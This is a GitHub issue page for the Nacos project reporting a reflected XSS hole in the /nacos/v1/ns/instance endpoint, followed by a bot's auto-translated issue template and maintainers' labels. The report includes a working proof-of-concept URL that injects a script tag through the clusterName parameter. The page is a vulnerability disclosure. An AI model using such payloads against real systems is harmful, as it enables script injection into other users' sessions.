Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

/nacos/v1/ns/instance have XSS security vulnerability #1717

Closed
binaryWorld opened this issue Aug 19, 2019 · 1 comment
Closed

/nacos/v1/ns/instance have XSS security vulnerability #1717

binaryWorld opened this issue Aug 19, 2019 · 1 comment
Labels
area/Nacos console Related to Nacos consle area/Naming kind/bug Category issues or prs related to bug.

Comments

@binaryWorld
Copy link

binaryWorld commented Aug 19, 2019
edited
Loading

http://xxx/nacos/v1/ns/instance?encoding=UTF-8&clusterName=DEFAULT%22%3E%3CScRIpt%3Ealert(%2288771c03-5251-4f2d-ba67-0f8f6245060b%22)%3C/ScRipT%3E&ip=172.23.232.107&ephemeral=true&namespaceId=public&serviceName=DEFAULT_GROUP@@executor-service&port=8888

image
image
@nacos-bot
Copy link
Collaborator

Hi @binaryWorld, we detect non-English characters in the issue. This comment is an auto translation from @nacos-bot to help other users to understand this issue.
We encourage you to describe your issue in English which is more friendly to other users.

/nacos/v1/ns/instance have XSS security vulnerability

Issue Description

Type: bug report or feature request

Describe what happened (or what feature you want)

Describe what you expected to happen

How to reproduce it (as minimally and precisely as possible)

Tell us your environment

Anything else we need to know?

@chuntaojun chuntaojun added the kind/bug Category issues or prs related to bug. label Aug 19, 2019
@KomachiSion KomachiSion added the area/Nacos console Related to Nacos consle label Dec 8, 2020
@KomachiSion KomachiSion mentioned this issue Mar 14, 2022
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
area/Nacos console Related to Nacos consle area/Naming kind/bug Category issues or prs related to bug.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@nkorange @binaryWorld @chuntaojun @KomachiSion @nacos-bot